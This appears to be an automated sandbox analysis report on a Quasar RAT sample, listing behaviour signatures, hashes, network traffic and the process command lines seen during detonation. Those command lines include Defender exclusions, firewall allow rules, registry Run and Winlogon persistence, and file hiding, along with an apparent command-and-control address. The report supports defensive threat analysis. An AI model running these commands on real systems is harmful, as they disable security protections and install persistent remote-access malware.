Analysis Overview
SHA256
e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa
Threat Level: Known bad
The file e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Modifies Windows Firewall
ACProtect 1.3x - 1.4x DLL software
UPX packed file
Unexpected DNS network traffic destination
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Runs ping.exe
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-15 00:15
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-15 00:15
Reported
2023-08-15 00:18
Platform
win10-20230703-en
Max time kernel
9s
Max time network
151s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa.exe
"C:\Users\Admin\AppData\Local\Temp\e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get Domain
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Users\Admin\AppData\Local\Temp\7z.exe
7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
C:\Users\Admin\AppData\Local\Temp\ratt.exe
"ratt.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 12
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 13
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 13
C:\Users\Admin\Music\rot.exe
"C:\Users\Admin\Music\rot.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | tcp | |
| NL | 94.131.105.161:12344 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
| MD5 | 7ea1fec84d76294d9256ae3dca7676b2 |
| SHA1 | 1e335451d1cbb6951bc77bf75430f4d983491342 |
| SHA256 | 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940 |
| SHA512 | ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317 |
memory/4888-139-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4888-140-0x0000000000E70000-0x0000000000E80000-memory.dmp
memory/4888-141-0x0000000000EF0000-0x0000000000F26000-memory.dmp
memory/4888-142-0x0000000000E70000-0x0000000000E80000-memory.dmp
memory/4888-143-0x0000000006EF0000-0x0000000007518000-memory.dmp
memory/4888-144-0x0000000006D80000-0x0000000006DA2000-memory.dmp
memory/4888-145-0x0000000007690000-0x00000000076F6000-memory.dmp
memory/4888-146-0x0000000007700000-0x0000000007766000-memory.dmp
memory/4888-147-0x0000000007770000-0x0000000007AC0000-memory.dmp
memory/4888-148-0x0000000007660000-0x000000000767C000-memory.dmp
memory/4888-149-0x0000000007B40000-0x0000000007B8B000-memory.dmp
memory/4888-150-0x0000000007E90000-0x0000000007F06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_maykpcua.pca.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4888-162-0x0000000000E70000-0x0000000000E80000-memory.dmp
memory/4888-166-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4888-161-0x0000000000E70000-0x0000000000E80000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 0f5cbdca905beb13bebdcf43fb0716bd |
| SHA1 | 9e136131389fde83297267faf6c651d420671b3f |
| SHA256 | a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060 |
| SHA512 | a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0 |
memory/196-170-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/196-172-0x0000000006C50000-0x0000000006C60000-memory.dmp
memory/196-171-0x0000000006C50000-0x0000000006C60000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b32bfb8ff565941eeec8448eae66d0b8 |
| SHA1 | 994230afbe8fe5b6604393b90127ea573ea7862d |
| SHA256 | 0f6270f85de99aaab52f8b62de2f8c454937b96cecf1e1d2f55dca8a4b875493 |
| SHA512 | cf2c9881c751717d781021e7deec9a09729820429a351f9ad4560e9dfc2840e2bcef74dfea3734376fd25ef2306e8ebd40806be9f20c60e4cd2705840d20afd6 |
memory/196-184-0x0000000006C50000-0x0000000006C60000-memory.dmp
memory/196-185-0x0000000006C50000-0x0000000006C60000-memory.dmp
memory/196-188-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4268-191-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4268-193-0x0000000006800000-0x0000000006810000-memory.dmp
memory/4268-192-0x0000000006800000-0x0000000006810000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3b1ccb4e755a6fd7ee86f89f9798096b |
| SHA1 | a4c316a6c18b82d13502d4698bfa138d15937109 |
| SHA256 | 5121b1144c05a756dad9a68d5fb610b8aea86166c07e03f9f2f279366617b79d |
| SHA512 | 37126c4c179ec88d797fae6f3a3c20b0d3eac813eca2d2b1f64136a1af736acbcd97d52bc487eb815d8e9c2f81de23823fa44acc19f9f619e0d4f79106625105 |
memory/4268-208-0x0000000006800000-0x0000000006810000-memory.dmp
memory/4268-209-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4268-205-0x0000000006800000-0x0000000006810000-memory.dmp
memory/2912-212-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/2912-214-0x0000000007330000-0x0000000007340000-memory.dmp
memory/2912-213-0x0000000007330000-0x0000000007340000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fdd6e0bdac69510118aa738e8198e212 |
| SHA1 | c71467a9d2945a58745e37c1c107a3a70d9c3845 |
| SHA256 | c82b3e386dcc4e7ff8a485c7045f2e2f117ea5753601b8ba8c4b93b106076238 |
| SHA512 | 0a5b564f91aaf8138e6aa93613a294368fd0c63e88b58e7efaf6ee3eca0dec8ed62d27079b62542e06d5e554ed28e07e217582698c315985d2998541312db339 |
memory/2912-229-0x0000000007330000-0x0000000007340000-memory.dmp
memory/2912-230-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/2912-226-0x0000000007330000-0x0000000007340000-memory.dmp
memory/4692-234-0x00000000049A0000-0x00000000049B0000-memory.dmp
memory/4692-233-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4692-235-0x00000000049A0000-0x00000000049B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 40a01d6e83af7052821e2bc25121d9f1 |
| SHA1 | 67aab843146e1e58182db6944e4843cec6ba3571 |
| SHA256 | 949552cc93791615f4aea21d0e9d8ddf7f366aa50ac68bdec838215e4af0646e |
| SHA512 | 3c3dc499fe673b09e5097d9e2953207197e05ddec270cebc32b2c08a19d1c1177f5b7b46b98482169c066855eab512a9c110831d721d96429cf9bbb936aff2fe |
memory/4692-248-0x00000000049A0000-0x00000000049B0000-memory.dmp
memory/4692-247-0x00000000049A0000-0x00000000049B0000-memory.dmp
memory/4692-251-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
memory/788-254-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
memory/788-258-0x0000000010000000-0x00000000100E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.7z
| MD5 | 7de6fdf3629c73bf0c29a96fa23ae055 |
| SHA1 | dcb37f6d43977601c6460b17387a89b9e4c0609a |
| SHA256 | 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff |
| SHA512 | d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8 |
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | 4f9003e856d1d7ebcd6b19c3cee516f4 |
| SHA1 | 15ecf9fd28132c946251d06fedb2a450c72ae8d6 |
| SHA256 | 538fcbb452fff37fdd6c8932162091470df8ba4eb71f1c2746eda101e8f69bdf |
| SHA512 | bc7b047b5c1b32b98c1694c9ee4730dba81a909b8ea318a7d85a7cd4e90f8736faaa70692a2be4119dba30839bbae4422b6ca8cb6d1346a5fc3afcf0fc7ff924 |
memory/788-262-0x0000000000400000-0x0000000000432000-memory.dmp
memory/3004-268-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/3004-269-0x00000000078A0000-0x0000000007BF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e7abb64cea778e7a984c29848297e5d |
| SHA1 | b29f6a338b6f071509ee8ef7673295a9e90f6e0c |
| SHA256 | b79f55021d1eb2a99fa8823ae9fd625bcd779e5dfbb23ea17ad503268e8c0865 |
| SHA512 | 47853482a33b4ded845a57613400242a6c43599269c9ca0311b9d9c88adfe79ba2c98601a3221c9cd9664f1ff6a1913bf9296b7a98620e7bb77956a4c0d831a2 |
memory/3004-271-0x00000000080D0000-0x000000000811B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Add.ps1
| MD5 | 0df43097e0f0acd04d9e17fb43d618b9 |
| SHA1 | 69b3ade12cb228393a93624e65f41604a17c83b6 |
| SHA256 | c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873 |
| SHA512 | 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb |
memory/3004-293-0x00000000091B0000-0x00000000091E3000-memory.dmp
memory/3004-294-0x0000000009190000-0x00000000091AE000-memory.dmp
memory/3004-299-0x00000000091F0000-0x0000000009295000-memory.dmp
memory/3004-300-0x0000000000FF0000-0x0000000001000000-memory.dmp
memory/3004-301-0x00000000093B0000-0x0000000009444000-memory.dmp
memory/3004-494-0x0000000009350000-0x000000000936A000-memory.dmp
memory/3004-499-0x0000000009340000-0x0000000009348000-memory.dmp
memory/3004-524-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/3004-525-0x0000000009B10000-0x000000000A188000-memory.dmp
memory/3004-526-0x0000000009490000-0x00000000094AA000-memory.dmp
memory/3004-531-0x0000000009500000-0x0000000009522000-memory.dmp
memory/3004-532-0x000000000A190000-0x000000000A68E000-memory.dmp
memory/3004-533-0x0000000000FF0000-0x0000000001000000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 815e4b48bcc3ad94c127c0a33e30d7aa |
| SHA1 | dab2e7081511ae647f1d91cb27a271fa0d9ddfaf |
| SHA256 | ee0f1c347082a1015b188e19ceec600860e8aa0795215f7c6ca95cfe4e3a8a90 |
| SHA512 | b691e4ed49e916249913dfe6cc6fed1c2436f6c299696562f0dc12ae9d0677275c479913de6d077ae479b6692eb532cd9fa651889ef2608095d97732620a72c9 |
memory/3004-561-0x0000000000FF0000-0x0000000001000000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe
| MD5 | 4ea98679fe659a40c6982c8231172ccd |
| SHA1 | 1669d363853192aa796e4d2bf6456a4e203cb643 |
| SHA256 | e4f5078bd2cf6b2cfc056fb863322fc21ed0c6dde8769533acfb915eab662db0 |
| SHA512 | 83bd180fb7b54ef804adc8b854479529584a046db9676350aaf0e90138f48c07a24b63a704281a68d50a3fc8d39322446c403c6b6a2bb81934694caa4fd2ebb4 |
memory/4848-566-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/4848-567-0x00000000009A0000-0x0000000000B56000-memory.dmp
memory/4848-568-0x0000000004A60000-0x0000000004AFC000-memory.dmp
memory/4848-579-0x0000000004B10000-0x0000000004BA2000-memory.dmp
memory/4848-583-0x0000000004C50000-0x0000000004C60000-memory.dmp
memory/4848-587-0x00000000049C0000-0x0000000004A06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | e1fe92ae896200fe10b6694e1c567829 |
| SHA1 | eb00cdd94f09ffba5ff0768b35945029284d3065 |
| SHA256 | 9a777da75dcb39b4bcc660346993067a34f25197a6f8984bbd00ef6d83d0e175 |
| SHA512 | 823079cbe87400a6c44f32044522819efe6492c898e0a28bd918394e24395dcab5574a156e0e8cc596a022076796989d4d77c8e03f3991a30a513827effc2064 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
| MD5 | 9e104e9aa0cfdec0753de24cbe3f587b |
| SHA1 | f63b8d0b29c65e518be6a9412e7499c9de11be78 |
| SHA256 | 59a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f |
| SHA512 | 8253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b |
C:\Users\Admin\Music\rot.exe
| MD5 | 2fadb968b8a22ecc27195dd488ec5b4c |
| SHA1 | 0b38692754d1e1a365928aca556efeaa43723d3f |
| SHA256 | 38427ac4d14b2e1c16c72a2448b1432b4e4340878bd6f60fbb1e7af882e84277 |
| SHA512 | eb4618fea77c146b39cc530cd3aeb703bf4e9da1bf8643396cbc56b69d551f932a8907fa9967a3f280f2e97a09fdfe5958141eb7e78897bbccdc01b8a6e7f55f |
C:\Users\Admin\Music\rot.exe
| MD5 | e1556df79fef6aa80dd7be05380a702a |
| SHA1 | 8c464a695fb1c6d5d2f2aa69e625c444dafe3d44 |
| SHA256 | dcdf7744cdadc9e131a521204e17e9df3262f5ac38a4f9189f27d5e079fbdd8c |
